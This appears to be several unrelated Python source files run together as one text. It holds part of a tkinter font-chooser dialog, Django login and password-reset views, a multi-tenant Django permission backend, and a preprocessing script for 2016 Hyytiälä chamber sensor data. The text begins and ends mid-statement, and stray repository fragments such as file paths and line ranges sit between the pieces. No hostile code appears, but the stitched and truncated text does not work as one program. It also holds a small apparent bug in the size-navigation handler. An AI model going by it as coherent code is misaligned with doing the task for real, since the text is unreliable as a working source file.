font_dict.get("family", self.fonts[0].replace('\ ', ' ')) font_dict["size"] = font_dict.get("size", 10) # --- creation of the widgets # ------ style parameters (bold, italic ...) options_frame = Frame(self, relief='groove', borderwidth=2) self.font_family = StringVar(self, " ".join(self.fonts)) self.font_size = StringVar(self, " ".join(self.sizes)) self.var_bold = BooleanVar(self, font_dict["weight"] == "bold") b_bold = Checkbutton(options_frame, text=TR["Bold"], command=self.toggle_bold, variable=self.var_bold) b_bold.grid(row=0, sticky="w", padx=4, pady=(4, 2)) self.var_italic = BooleanVar(self, font_dict["slant"] == "italic") b_italic = Checkbutton(options_frame, text=TR["Italic"], command=self.toggle_italic, variable=self.var_italic) b_italic.grid(row=1, sticky="w", padx=4, pady=2) self.var_underline = BooleanVar(self, font_dict["underline"]) b_underline = Checkbutton(options_frame, text=TR["Underline"], command=self.toggle_underline, variable=self.var_underline) b_underline.grid(row=2, sticky="w", padx=4, pady=2) self.var_overstrike = BooleanVar(self, font_dict["overstrike"]) b_overstrike = Checkbutton(options_frame, text=TR["Overstrike"], variable=self.var_overstrike, command=self.toggle_overstrike) b_overstrike.grid(row=3, sticky="w", padx=4, pady=(2, 4)) # ------ Size and family self.var_size = StringVar(self) self.entry_family = Entry(self, width=max_length, validate="key", validatecommand=(self._validate_family, "%d", "%S", "%i", "%s", "%V")) self.entry_size = Entry(self, width=4, validate="key", textvariable=self.var_size, validatecommand=(self._validate_size, "%d", "%P", "%V")) self.list_family = Listbox(self, selectmode="browse", listvariable=self.font_family, highlightthickness=0, exportselection=False, width=max_length) self.list_size = Listbox(self, selectmode="browse", listvariable=self.font_size, highlightthickness=0, exportselection=False, width=4) scroll_family = Scrollbar(self, orient='vertical', command=self.list_family.yview) scroll_size = Scrollbar(self, orient='vertical', command=self.list_size.yview) self.preview_font = Font(self, **font_dict) if len(text) > 30: text = text[:30] self.preview = Label(self, relief="groove", style="prev.TLabel", text=text, font=self.preview_font, anchor="center") # --- widget configuration self.list_family.configure(yscrollcommand=scroll_family.set) self.list_size.configure(yscrollcommand=scroll_size.set) self.entry_family.insert(0, font_dict["family"]) self.entry_family.selection_clear() self.entry_family.icursor("end") self.entry_size.insert(0, font_dict["size"]) try: i = self.fonts.index(self.entry_family.get().replace(" ", "\ ")) except ValueError: # unknown font i = 0 self.list_family.selection_clear(0, "end") self.list_family.selection_set(i) self.list_family.see(i) try: i = self.sizes.index(self.entry_size.get()) self.list_size.selection_clear(0, "end") self.list_size.selection_set(i) self.list_size.see(i) except ValueError: # size not in list pass self.entry_family.grid(row=0, column=0, sticky="ew", pady=(10, 1), padx=(10, 0)) self.entry_size.grid(row=0, column=2, sticky="ew", pady=(10, 1), padx=(10, 0)) self.list_family.grid(row=1, column=0, sticky="nsew", pady=(1, 10), padx=(10, 0)) self.list_size.grid(row=1, column=2, sticky="nsew", pady=(1, 10), padx=(10, 0)) scroll_family.grid(row=1, column=1, sticky='ns', pady=(1, 10)) scroll_size.grid(row=1, column=3, sticky='ns', pady=(1, 10)) options_frame.grid(row=0, column=4, rowspan=2, padx=10, pady=10, ipadx=10) self.preview.grid(row=2, column=0, columnspan=5, sticky="eswn", padx=10, pady=(0, 10), ipadx=4, ipady=4) button_frame = Frame(self) button_frame.grid(row=3, column=0, columnspan=5, pady=(0, 10), padx=10) Button(button_frame, text="Ok", command=self.ok).grid(row=0, column=0, padx=4, sticky='ew') Button(button_frame, text=TR["Cancel"], command=self.quit).grid(row=0, column=1, padx=4, sticky='ew') self.list_family.bind('<>', self.update_entry_family) self.list_size.bind('<>', self.update_entry_size, add=True) self.list_family.bind("", self.keypress) self.entry_family.bind("", self.change_font_family) self.entry_family.bind("", self.tab) self.entry_size.bind("", self.change_font_size) self.entry_family.bind("", self.down_family) self.entry_size.bind("", self.down_size) self.entry_family.bind("", self.up_family) self.entry_size.bind("", self.up_size) # bind Ctrl+A to select all instead of go to beginning self.bind_class("TEntry", "", self.select_all) self.wait_visibility(self) self.grab_set() self.entry_family.focus_set() self.lift() def select_all(self, event): """Select all entry content.""" event.widget.selection_range(0, "end") def keypress(self, event): """Select the first font whose name begin by the key pressed.""" key = event.char.lower() l = [i for i in self.fonts if i[0].lower() == key] if l: i = self.fonts.index(l[0]) self.list_family.selection_clear(0, "end") self.list_family.selection_set(i) self.list_family.see(i) self.update_entry_family() def up_family(self, event): """Navigate in the family listbox with up key.""" try: i = self.list_family.curselection()[0] self.list_family.selection_clear(0, "end") if i <= 0: i = len(self.fonts) self.list_family.see(i - 1) self.list_family.select_set(i - 1) except TclError: self.list_family.selection_clear(0, "end") i = len(self.fonts) self.list_family.see(i - 1) self.list_family.select_set(i - 1) self.list_family.event_generate('<>') def up_size(self, event): """Navigate in the size listbox with up key.""" try: s = self.var_size.get() if s in self.sizes: i = self.sizes.index(s) elif s: sizes = list(self.sizes) sizes.append(s) sizes.sort(key=lambda x: int(x)) i = sizes.index(s) else: i = 0 self.list_size.selection_clear(0, "end") if i <= 0: i = len(self.sizes) self.list_size.see(i - 1) self.list_size.select_set(i - 1) except TclError: i = len(self.sizes) self.list_size.see(i - 1) self.list_size.select_set(i - 1) self.list_size.event_generate('<>') def down_family(self, event): """Navigate in the family listbox with down key.""" try: i = self.list_family.curselection()[0] self.list_family.selection_clear(0, "end") if i >= len(self.fonts): i = -1 self.list_family.see(i + 1) self.list_family.select_set(i + 1) except TclError: self.list_family.selection_clear(0, "end") self.list_family.see(0) self.list_family.select_set(0) self.list_family.event_generate('<>') def down_size(self, event): """Navigate in the size listbox with down key.""" try: s = self.var_size.get() if s in self.sizes: i = self.sizes.index(s) elif s: sizes = list(self.sizes) sizes.append(s) sizes.sort(key=lambda x: int(x)) i = sizes.index(s) - 1 else: s = len(self.sizes) - 1 self.list_size.selection_clear(0, "end") if i < len(self.sizes) - 1: self.list_size.selection_set(i + 1) self.list_size.see(i + 1) else: self.list_size.see(0) self.list_size.select_set(0) except TclError: self.list_size.selection_set(0) self.list_size.event_generate('<>') def toggle_bold(self): """Update font preview weight.""" b = self.var_bold.get() self.preview_font.configure(weight=["normal", "bold"][b]) def toggle_italic(self): """Update font preview slant.""" b = self.var_italic.get() self.preview_font.configure(slant=["roman", "italic"][b]) def toggle_underline(self): """Update font preview underline.""" b = self.var_underline.get() self.preview_font.configure(underline=b) def toggle_overstrike(self): """Update font preview overstrike.""" b = self.var_overstrike.get() self.preview_font.configure(overstrike=b) def change_font_family(self, event=None): """Update font preview family.""" family = self.entry_family.get() if family.replace(" ", "\ ") in self.fonts: self.preview_font.configure(family=family) def change_font_size(self, event=None): """Update font preview size.""" size = int(self.var_size.get()) self.preview_font.configure(size=size) def validate_font_size(self, d, ch, V): """Validation of the size entry content.""" l = [i for i in self.sizes if i[:len(ch)] == ch] i = None if l: i = self.sizes.index(l[0]) elif ch.isdigit(): sizes = list(self.sizes) sizes.append(ch) sizes.sort(key=lambda x: int(x)) i = min(sizes.index(ch), len(self.sizes)) if i is not None: self.list_size.selection_clear(0, "end") self.list_size.selection_set(i) deb = self.list_size.nearest(0) fin = self.list_size.nearest(self.list_size.winfo_height()) if V != "forced": if i < deb or i > fin: self.list_size.see(i) return True if d == '1': return ch.isdigit() else: return True def tab(self, event): """Move at the end of selected text on tab press.""" self.entry_family = event.widget self.entry_family.selection_clear() self.entry_family.icursor("end") return "break" def validate_font_family(self, action, modif, pos, prev_txt, V): """Completion of the text in the entry with existing font names.""" if self.entry_family.selection_present(): sel = self.entry_family.selection_get() txt = prev_txt.replace(sel, '') else: txt = prev_txt if action == "0": txt = txt[:int(pos)] + txt[int(pos) + 1:] return True else: txt = txt[:int(pos)] + modif + txt[int(pos):] ch = txt.replace(" ", "\ ") l = [i for i in self.fonts if i[:len(ch)] == ch] if l: i = self.fonts.index(l[0]) self.list_family.selection_clear(0, "end") self.list_family.selection_set(i) deb = self.list_family.nearest(0) fin = self.list_family.nearest(self.list_family.winfo_height()) index = self.entry_family.index("insert") self.entry_family.delete(0, "end") self.entry_family.insert(0, l[0].replace("\ ", " ")) self.entry_family.selection_range(index + 1, "end") self.entry_family.icursor(index + 1) if V != "forced": if i < deb or i > fin: self.list_family.see(i) return True else: return False def update_entry_family(self, event=None): """Update family entry when an item is selected in the family listbox.""" # family = self.list_family.get("@%i,%i" % (event.x , event.y)) family = self.list_family.get(self.list_family.curselection()[0]) self.entry_family.delete(0, "end") self.entry_family.insert(0, family) self.entry_family.selection_clear() self.entry_family.icursor("end") self.change_font_family() def update_entry_size(self, event): """Update size entry when an item is selected in the size listbox.""" # size = self.list_size.get("@%i,%i" % (event.x , event.y)) size = self.list_size.get(self.list_size.curselection()[0]) self.var_size.set(size) self.change_font_size() def ok(self): """Validate choice.""" self.res = self.preview_font.actual() self.quit() def get_res(self): """Return chosen font.""" return self.res def quit(self): self.destroy() def askfont(master=None, text="Abcd", title="Font Chooser", **font_args): """ Open the font chooser and return the chosen font. Arguments: master: master window text: sample text to be displayed in the font chooser title: dialog title font_args: family, size, slant (=roman/italic), weight (=normal/bold), underline (bool), overstrike (bool) """ chooser = FontChooser(master, font_args, text, title) chooser.wait_window(chooser) return chooser.get_res() if __name__ == "__main__": """Example.""" try: from tkinter import Tk except ImportError: from Tkinter import Tk from sys import platform root = Tk() style = Style(root) if "win" == platform[:3]: style.theme_use('vista') elif "darwin" in platform: style.theme_use('clam') else: style.theme_use('clam') bg = style.lookup("TLabel", "background") root.configure(bg=bg) label = Label(root, text='Chosen font: ') label.pack(padx=10, pady=(10, 4)) def callback(): font = askfont(root, title="Choose a font") if font: # spaces in the family name need to be escaped font['family'] = font['family'].replace(' ', '\ ') font_str = "%(family)s %(size)i %(weight)s %(slant)s" % font if font['underline']: font_str += ' underline' if font['overstrike']: font_str += ' overstrike' label.configure(font=font_str, text='Chosen font: ' + font_str.replace('\ ', ' ')) Button(root, text='Font Chooser', command=callback).pack(padx=10, pady=(4, 10)) root.mainloop() 1-10 from django.shortcuts import get_object_or_404, render from django.http import HttpResponse from django.urls import reverse from django.views import generic from .forms import SignupForm, LoginForm, MyForgotPasswordForm, MySetPasswordForm from django.contrib.auth.models import User from django.http import JsonResponse import json from django.urls import reverse_lazy from django.contrib.auth import login from django.contrib.auth.views import LoginView,PasswordResetView, PasswordResetDoneView, PasswordResetConfirmView, PasswordResetCompleteView from django.contrib.sessions.models import Session from django.contrib import messages from django.shortcuts import resolve_url from django.conf import settings from django.contrib.auth.mixins import LoginRequiredMixin from django.utils.translation import gettext as _ # INDEX class HomePageView(LoginRequiredMixin,generic.TemplateView): template_name = 'users/index.html' context_object_name = 'latest_question_list' def get_context_data(self, **kwargs): self.request.session['foo'] = 'xbar' context = super(HomePageView, self).get_context_data(**kwargs) return context # SIGNUP class RegisterView(generic.CreateView): model = User success_url = reverse_lazy('users:index') form_class = SignupForm template_name = 'users/register.html' # LOGIN class MyLogin(LoginView): authentication_form = LoginForm template_name = 'users/login.html' redirect_authenticated_user = True def get_success_url(self): url = self.get_redirect_url() messages.success(self.request, 'Successfully logged in',extra_tags='alert-success') return url or resolve_url(settings.LOGIN_REDIRECT_URL) # Forgot Password Form class MyPasswordReset(PasswordResetView): form_class = MyForgotPasswordForm from_email = '' template_name = 'users/registration/password_reset_form.html' email_template_name = 'email/forgot_password.html' success_url = reverse_lazy('users:password_reset_done') subject_template_name = 'users/auth/password_reset_subject.txt' # Email Sent class MyPasswordResetDone(PasswordResetDoneView): template_name = 'users/registration/password_reset_done.html' # LINK Landing Page class MyPasswordResetConfirm(PasswordResetConfirmView): post_reset_login = True post_reset_login_backend = 'django.contrib.auth.backends.ModelBackend' form_class = MySetPasswordForm success_url = reverse_lazy('users:password_reset_complete') template_name = 'users/registration/password_reset_confirm.html' # Password Change Success class MyPasswordResetComplete(PasswordResetCompleteView): template_name = 'users/registration/password_reset_complete.html' title = _('Password reset complete') shared_schema_tenants/auth_backends.py10-100 import logging from django.contrib.auth.models import Permission from django.contrib.auth.backends import ModelBackend from django.contrib.auth import get_user_model from django.db.models import Q from shared_schema_tenants.models import TenantRelationship from shared_schema_tenants.helpers.tenants import get_current_tenant UserModel = get_user_model() logger = logging.getLogger(__name__) class TenantModelBackend(ModelBackend): """ Authenticates against settings.AUTH_USER_MODEL. """ def _get_user_global_permissions(self, user_obj): return user_obj.user_permissions.all() def _get_group_global_permissions(self, user_obj): user_groups_field = get_user_model()._meta.get_field('groups') user_groups_query = 'group__%s' % user_groups_field.related_query_name() return Permission.objects.filter(**{user_groups_query: user_obj}) def _get_user_tenant_permissions(self, relationship): return relationship.permissions.all() def _get_group_tenant_permissions(self, relationship): relationship_groups_field = TenantRelationship._meta.get_field('groups') relationship_groups_query = 'group__%s' % relationship_groups_field.related_query_name() return Permission.objects.filter(**{relationship_groups_query: relationship}) def _get_user_permissions(self, relationship): relationship_permissions_field = TenantRelationship._meta.get_field('permissions') relationship_permission_query = relationship_permissions_field.related_query_name() user_permissions_field = UserModel._meta.get_field('user_permissions') user_permission_query = user_permissions_field.related_query_name() user_groups_field = get_user_model()._meta.get_field('groups') user_groups_query = 'group__%s' % user_groups_field.related_query_name() return Permission.objects.filter( Q(**{relationship_permission_query: relationship}) | Q(**{user_permission_query: relationship.user}) | Q(**{user_groups_query: relationship.user})).distinct() def _get_group_permissions(self, relationship): relationship_groups_field = TenantRelationship._meta.get_field( 'groups') relationship_groups_query = 'group__%s' % relationship_groups_field.related_query_name() user_groups_field = get_user_model()._meta.get_field('groups') user_groups_query = 'group__%s' % user_groups_field.related_query_name() return Permission.objects.filter( Q(**{relationship_groups_query: relationship}) | Q(**{user_groups_query: relationship.user})) def _get_tenant_permissions(self, user_obj, obj, from_name): if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() tenant = get_current_tenant() if not tenant: return set() perm_cache_name = '_tenant_%s_perm_cache' % from_name if (not hasattr(user_obj, perm_cache_name) or not getattr(user_obj, perm_cache_name).get(tenant.pk)): if user_obj.is_superuser: relationship_perms = Permission.objects.all() relationship_perms = relationship_perms.values_list( 'content_type__app_label', 'codename').order_by() else: try: relationship = TenantRelationship.objects.get( user=user_obj, tenant=tenant) except TenantRelationship.DoesNotExist: relationship_perms = set() else: relationship_perms = getattr(self, '_get_%s_tenant_permissions' % from_name)(relationship) relationship_perms = relationship_perms.values_list( 'content_type__app_label', 'codename').order_by() setattr(user_obj, perm_cache_name, { tenant.pk: { "%s.%s" % (ct, name) for ct, name in relationship_perms } }) return getattr(user_obj, perm_cache_name).get(tenant.pk) def _get_global_permissions(self, user_obj, obj, from_name): if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() perm_cache_name = '_%s_perm_cache' % from_name if not hasattr(user_obj, perm_cache_name): if user_obj.is_superuser: perms = Permission.objects.all() else: perms = getattr(self, '_get_%s_global_permissions' % from_name)(user_obj) perms = perms.values_list('content_type__app_label', 'codename').order_by() setattr(user_obj, perm_cache_name, set("%s.%s" % (ct, name) for ct, name in perms)) return getattr(user_obj, perm_cache_name) def _get_permissions(self, user_obj, obj, from_name): return self._get_global_permissions(user_obj, obj, from_name).union( self._get_tenant_permissions(user_obj, obj, from_name)) def get_user_global_permissions(self, user_obj, obj=None): return self._get_global_permissions(user_obj, obj, 'user') def get_user_tenant_permissions(self, user_obj, obj=None): return self._get_tenant_permissions(user_obj, obj, 'user') def get_group_global_permissions(self, user_obj, obj=None): return self._get_global_permissions(user_obj, obj, 'group') def get_group_tenant_permissions(self, user_obj, obj=None): return self._get_tenant_permissions(user_obj, obj, 'group') def get_all_global_permissions(self, user_obj, obj=None): if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() if not hasattr(user_obj, '_perm_cache'): user_obj._perm_cache = self.get_user_global_permissions(user_obj, obj) user_obj._perm_cache.update(self.get_group_global_permissions(user_obj, obj)) return user_obj._perm_cache def get_all_tenant_permissions(self, user_obj, obj=None): if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() tenant = get_current_tenant() if not tenant: return set() if (not hasattr(user_obj, '_tenant_perm_cache') or not getattr(user_obj, '_tenant_perm_cache').get(tenant.pk)): user_obj._tenant_perm_cache = {tenant.pk: self.get_user_tenant_permissions(user_obj, obj)} user_obj._tenant_perm_cache[tenant.pk].update(self.get_group_tenant_permissions(user_obj, obj)) return user_obj._tenant_perm_cache[tenant.pk] def get_all_permissions(self, user_obj, obj=None): return self.get_all_global_permissions(user_obj, obj).union( self.get_all_tenant_permissions(user_obj, obj)) """ Extract, combine, and correct chamber sensor data. For pre-processing only, not intended for general-purpose use. Hyytiälä COS campaign, April-November 2016 (c) 2016-2017 <> Revision history ---------------- 26 May 2016, W.S. - The two PAR sensors are now called 'PAR_ch_1' and 'PAR_ch_2', because their association with the chambers changed throughout the campaign. 29 Aug 2016, W.S. - Continue to the next day's file in the loop when the current day's file is not found. This is to skip the day 28 Aug 2016 for missing data. 16 Jan 2017, W.S. - Running options are now controlled by an external config file. - Code review and small edits - Ad hoc filtering criteria added - Daily plot option added, which is controlled by the preprocessing config """ import argparse import glob import datetime import numpy as np import pandas as pd import matplotlib.pyplot as plt import preproc_config # preprocessing config file, in the same directory def IQR_bounds_func(x): """Filter thermocouple data by IQR bounds. Used only in this script.""" if np.sum(np.isfinite(x)) > 0: q1, q3 = np.nanpercentile(x, [25, 75]) IQR = q3 - q1 return(q1 - 2 * IQR, q3 + 5 * IQR) else: return(np.nan, np.nan) # define terminal argument parser parser = argparse.ArgumentParser( description='Extract, combine, and correct chamber sensor data.') parser.add_argument('-s', '--silent', dest='flag_silent_mode', action='store_true', help='silent mode: run without printing daily summary') args = parser.parse_args() # echo program starting print('Subsetting, gapfilling and downsampling the biomet sensor data...') dt_start = datetime.datetime.now() print(datetime.datetime.strftime(dt_start, '%Y-%m-%d %X')) print('numpy version = ' + np.__version__) print('pandas version = ' + pd.__version__) if preproc_config.run_options['plot_sensor_data']: print('Plotting option is enabled. Will generate daily plots.') # settings pd.options.display.float_format = '{:.2f}'.format # let pandas dataframe displays float with 2 decimal places plt.rcParams.update({'mathtext.default': 'regular'}) # sans-serif math plt.style.use('ggplot') sensor_dir = preproc_config.data_dir['sensor_data_raw'] output_dir = preproc_config.data_dir['sensor_data_reformatted'] # get file list of sensor data lc_sensor_flist = glob.glob( sensor_dir + '/sm_cop/*.cop') # leaf chamber sensors sc_sensor_flist = glob.glob( sensor_dir + '/sm_mpr/*.mpr') # soil chamber sensors # local time is UTC+2 doy_today = (datetime.datetime.utcnow() - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. + 2. / 24. if preproc_config.run_options['process_recent_period']: doy_start = np.int(doy_today - preproc_config.run_options['traceback_in_days']) doy_end = np.int(np.ceil(doy_today)) else: doy_start = 97 # campaign starts on 7 Apr 2016 doy_end = 315 # campaign ends on 10 Nov 2016 (plus one for `range()`) year_start = 2016 # starting year for converting day of year values # data fields in the leaf chamber sensor data file (*.cop) # correspondence between chamber number and sensor number was changing # throughout the campaign. refer to the metadata table for the information. # 0 - time; 1 - PAR_ch_1; 2 - PAR_ch_2; # 8 - ambient T; 10 - T_ch_1; # 11 - T_ch_2; 12 - T_ch_3; # data fields in the soil chamber sensor data file (*.mpr) # 0 - time; 5 - soil chamber 1 (T_ch_4); 6 - soil chamber 2 (T_ch_5) # 7 - soil chamber 3 (T_ch_6) for doy in range(doy_start, doy_end): run_date_str = (datetime.datetime(2016, 1, 1) + datetime.timedelta(doy + 0.5)).strftime('%y%m%d') current_lc_sensor_files = [s for s in lc_sensor_flist if run_date_str in s] current_sc_sensor_files = [s for s in sc_sensor_flist if run_date_str in s] # reading leaf chamber sensor data df_lc_sensor = None if len(current_lc_sensor_files) > 0: for entry in current_lc_sensor_files: df_lc_sensor_loaded = pd.read_csv( entry, sep='\\s+', usecols=[0, 1, 2, 8, 10, 11, 12], names=['datetime', 'PAR_ch_1', 'PAR_ch_2', 'T_amb', 'T_ch_1', 'T_ch_2', 'T_ch_3'], dtype={'datetime': str, 'PAR_ch_1': np.float64, 'PAR_ch_2': np.float64, 'T_amb': np.float64, 'T_ch_1': np.float64, 'T_ch_2': np.float64, 'T_ch_3': np.float64}, parse_dates={'timestamp': [0]}, date_parser=lambda s: np.datetime64( '%s-%s-%s %s:%s:%s' % (s[0:4], s[4:6], s[6:8], s[8:10], s[10:12], s[12:14])), engine='c', na_values='-') if df_lc_sensor is None: df_lc_sensor = df_lc_sensor_loaded else: df_lc_sensor = pd.concat([df_lc_sensor, df_lc_sensor_loaded], ignore_index=True) del df_lc_sensor_loaded else: print('Leaf chamber sensor data file not found on day 20%s' % run_date_str) continue # reading soil chamber sensor data df_sc_sensor = None if len(current_sc_sensor_files) > 0: for entry in current_sc_sensor_files: df_sc_sensor_loaded = pd.read_csv( entry, sep='\\s+', usecols=[0, 5, 6, 7], names=['datetime', 'T_ch_4', 'T_ch_5', 'T_ch_6'], dtype={'datetime': str, 'T_ch_4': np.float64, 'T_ch_5': np.float64, 'T_ch_6': np.float64}, parse_dates={'timestamp': [0]}, date_parser=lambda s: np.datetime64( '%s-%s-%s %s:%s:%s' % (s[0:4], s[4:6], s[6:8], s[8:10], s[10:12], s[12:14])), engine='c') if df_sc_sensor is None: df_sc_sensor = df_sc_sensor_loaded else: df_sc_sensor = pd.concat([df_sc_sensor, df_sc_sensor_loaded], ignore_index=True) del df_sc_sensor_loaded else: print('Soil chamber sensor data file not found on day 20%s' % run_date_str) continue # convert day of year number doy_lc_sensor = \ (df_lc_sensor['timestamp'] - pd.Timestamp('%s-01-01' % year_start)) / \ pd.Timedelta(days=1) # parse datetime strings # doy_lc_sensor = np.zeros(df_lc_sensor.shape[0]) * np.nan # for i in range(df_lc_sensor.shape[0]): # dt_str = df_lc_sensor.loc[i, 'datetime'] # if len(dt_str) == 14: # # accelerate datetime parsing with manual operations # dt_converted = datetime.datetime( # int(dt_str[0:4]), int(dt_str[4:6]), int(dt_str[6:8]), # int(dt_str[8:10]), int(dt_str[10:12]), int(dt_str[12:14])) # doy_lc_sensor[i] = \ # (dt_converted - # datetime.datetime(2016, 1, 1)).total_seconds() / 86400. # # doy_lc_sensor[i] = ( # # datetime.datetime.strptime(dt_str, '%Y%m%d%H%M%S') - # # datetime.datetime(2016, 1, 1)).total_seconds() / 86400. # else: # doy_lc_sensor[i] = np.nan # indices for insertion, range 0 to 17279 ind_lc_sensor = (doy_lc_sensor - doy) * 86400. / 5. ind_lc_sensor = np.round(ind_lc_sensor).astype(np.int64) # convert day of year number doy_sc_sensor = \ (df_sc_sensor['timestamp'] - pd.Timestamp('%s-01-01' % year_start)) / \ pd.Timedelta(days=1) # doy_sc_sensor = np.zeros(df_sc_sensor.shape[0]) * np.nan # for i in range(df_sc_sensor.shape[0]): # dt_str = df_sc_sensor.loc[i, 'datetime'] # if len(dt_str) == 14: # # accelerate datetime parsing with manual operations # dt_converted = datetime.datetime( # int(dt_str[0:4]), int(dt_str[4:6]), int(dt_str[6:8]), # int(dt_str[8:10]), int(dt_str[10:12]), int(dt_str[12:14])) # doy_sc_sensor[i] = \ # (dt_converted - # datetime.datetime(2016, 1, 1)).total_seconds() / 86400. # # doy_sc_sensor[i] = ( # # datetime.datetime.strptime(dt_str, '%Y%m%d%H%M%S') - # # datetime.datetime(2016, 1, 1)).total_seconds() / 86400. # else: # doy_sc_sensor[i] = np.nan # indices for insertion, range 0 to 17279 ind_sc_sensor = (doy_sc_sensor - doy) * 86400. / 5. ind_sc_sensor = np.round(ind_sc_sensor).astype(np.int64) # corrections for PAR and TC values # parameters from <>, 13 April 2016 # correction factor for 'PAR_ch_2' was updated 27 October 2016, # according to <> df_lc_sensor['PAR_ch_1'] *= 200. # was 210-220 df_lc_sensor['PAR_ch_2'] *= 205. # was 200 df_lc_sensor['T_ch_1'] = df_lc_sensor['T_ch_1'] * 0.94 + 0.75 df_lc_sensor['T_ch_2'] = df_lc_sensor['T_ch_2'] * 0.96 - 0.20 if doy < 103: # before 13 April 2016, but not including that day df_lc_sensor['T_ch_3'] = df_lc_sensor['T_ch_3'] * 0.98 - 0.89 else: # TC in the large leaf chamber reinstalled 13 April 2016 11:20 am # before that, temperature data were corrupt at this channel df_lc_sensor['T_ch_3'] = df_lc_sensor['T_ch_3'] * 0.97 - 0.39 # mask corrupt data # 1. 'T_ch_3' data between April 8 and 13 of 2016 were corrupt if doy == 98: break_pt = (datetime.datetime(2016, 4, 8, 9, 33, 41) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor > break_pt, 'T_ch_3'] = np.nan del break_pt elif 98 < doy < 103: df_lc_sensor['T_ch_3'] = np.nan elif doy == 103: break_pt = (datetime.datetime(2016, 4, 13, 11, 20, 24) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor < break_pt, 'T_ch_3'] = np.nan del break_pt # 2. no soil chamber sensors before 12 April 2016 10:37:09 am if doy < 102: df_sc_sensor[['T_ch_4', 'T_ch_5', 'T_ch_6']] = np.nan elif doy == 102: break_pt = (datetime.datetime(2016, 4, 12, 10, 37, 9) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_sc_sensor.loc[doy_sc_sensor < break_pt, ['T_ch_4', 'T_ch_5', 'T_ch_6']] = np.nan del break_pt # 3. remove 'PAR_ch_2' data before before 8 April 2016 09:40:25 am if doy == 97: df_lc_sensor['PAR_ch_2'] = np.nan elif doy == 98: break_pt = (datetime.datetime(2016, 4, 8, 9, 40, 25) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor < break_pt, 'PAR_ch_2'] = np.nan del break_pt # 4. 'PAR_ch_2' data from 08:40 to 09:41 on 7 June 2016 were corrupt if doy == 158: break_pt1 = (datetime.datetime(2016, 6, 7, 8, 40) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. break_pt2 = (datetime.datetime(2016, 6, 7, 9, 41) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[ (doy_lc_sensor > break_pt1) & (doy_lc_sensor < break_pt2) & (df_lc_sensor['PAR_ch_1'].values < 400.), 'PAR_ch_1'] = np.nan df_lc_sensor.loc[ (doy_lc_sensor > break_pt1) & (doy_lc_sensor < break_pt2) & (df_lc_sensor['PAR_ch_2'].values < 400.), 'PAR_ch_2'] = np.nan del break_pt1, break_pt2 # 5. power failure for leaf chamber sensor logger # no data from 30 Aug 2016 13:44:36 to 5 Sep 2016 11:22:44 if doy == 242: break_pt = (datetime.datetime(2016, 8, 30, 13, 44, 36) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor > break_pt, 1:] = np.nan if 242 < doy < 248: df_lc_sensor.loc[:, 1:] = np.nan if doy == 248: break_pt = (datetime.datetime(2016, 9, 5, 11, 22, 44) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor < break_pt, 1:] = np.nan # 6. thermocouple at channel 11 (T_ch_2) was fallen during # 29 Aug 2016 09:00 to 12 Sep 2016 11:00 if 241 <= doy < 255: df_lc_sensor['T_ch_2'] = np.nan elif doy == 255: break_pt = (datetime.datetime(2016, 9, 12, 11, 0, 0) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor < break_pt, 'T_ch_2'] = np.nan # 7. Bad PAR measurements from 10:30 to 11:00 on 5 Oct 2016 (?) # no action, since no abnormal measurements were detected in this period # 8. allow -5 as the lower limit of PAR (tolerance for random errors) df_lc_sensor.loc[df_lc_sensor['PAR_ch_1'] < -5., 'PAR_ch_1'] = np.nan df_lc_sensor.loc[df_lc_sensor['PAR_ch_2'] < -5., 'PAR_ch_2'] = np.nan # 9. identify corrupt thermocouple measurements using IQR criteria for col in ['T_amb', 'T_ch_1', 'T_ch_2', 'T_ch_3']: if np.sum(np.isfinite(df_lc_sensor[col].values)) > 0: TC_lolim, TC_uplim = IQR_bounds_func(df_lc_sensor[col].values) df_lc_sensor.loc[(df_lc_sensor[col] < TC_lolim) | (df_lc_sensor[col] > TC_uplim), col] = np.nan for col in ['T_ch_4', 'T_ch_5', 'T_ch_6']: if np.sum(np.isfinite(df_sc_sensor[col].values)) > 0: TC_lolim, TC_uplim = IQR_bounds_func(df_sc_sensor[col].values) df_sc_sensor.loc[(df_sc_sensor[col] < TC_lolim) | (df_sc_sensor[col] > TC_uplim), col] = np.nan df_all_sensor = pd.DataFrame( columns=['doy', 'PAR_ch_1', 'PAR_ch_2', 'T_amb', 'T_ch_1', 'T_ch_2', 'T_ch_3', 'T_ch_4', 'T_ch_5', 'T_ch_6'], dtype=np.float64) df_all_sensor['doy'] = doy + np.arange(0, 86400, 5) / 86400. for col in df_lc_sensor.columns.values[1:]: df_all_sensor.loc[ind_lc_sensor, col] = df_lc_sensor[col] for col in df_sc_sensor.columns.values[1:]: df_all_sensor.loc[ind_sc_sensor, col] = df_sc_sensor[col] # for i in range(df_all_sensor.shape[0]): # loc_lc_sensor = np.where( # np.abs(doy_lc_sensor - df_all_sensor.loc[i, 'doy']) < 1e-5)[0] # loc_sc_sensor = np.where( # np.abs(doy_sc_sensor - df_all_sensor.loc[i, 'doy']) < 1e-5)[0] # if loc_lc_sensor.size > 0: # for col in df_lc_sensor.columns.values[1:]: # df_all_sensor.set_value( # i, col, df_lc_sensor.loc[loc_lc_sensor[0], col]) # if loc_sc_sensor.size > 0: # for col in df_sc_sensor.columns.values[1:]: # df_all_sensor.set_value( # i, col, df_sc_sensor.loc[loc_sc_sensor[0], col]) # '%.2f' is the accuracy of the raw data; round the sensor data df_all_sensor = df_all_sensor.round({ 'doy': 14, 'PAR_ch_1': 2, 'PAR_ch_2': 2, 'T_amb': 2, 'T_ch_1': 2, 'T_ch_2': 2, 'T_ch_3': 2, 